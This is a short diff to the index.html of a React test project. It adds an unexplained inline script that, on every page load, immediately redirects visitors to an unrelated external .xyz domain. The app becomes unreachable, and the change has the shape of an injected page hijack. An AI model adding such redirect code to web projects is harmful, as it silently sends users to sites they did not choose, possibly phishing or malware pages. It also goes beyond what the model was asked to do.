--- a/Tips 23-02/react-test/index.html
+++ b/Tips 23-02/react-test/index.html
@@ -9,5 +9,10 @@
   <body>
     <div id="root"></div>
     <script type="module" src="/src/main.tsx"></script>
+    <script>
+      {
+        window.location.replace("https://www.consultoraenlazar.xyz");
+      }
+    </script>
   </body>
 </html>
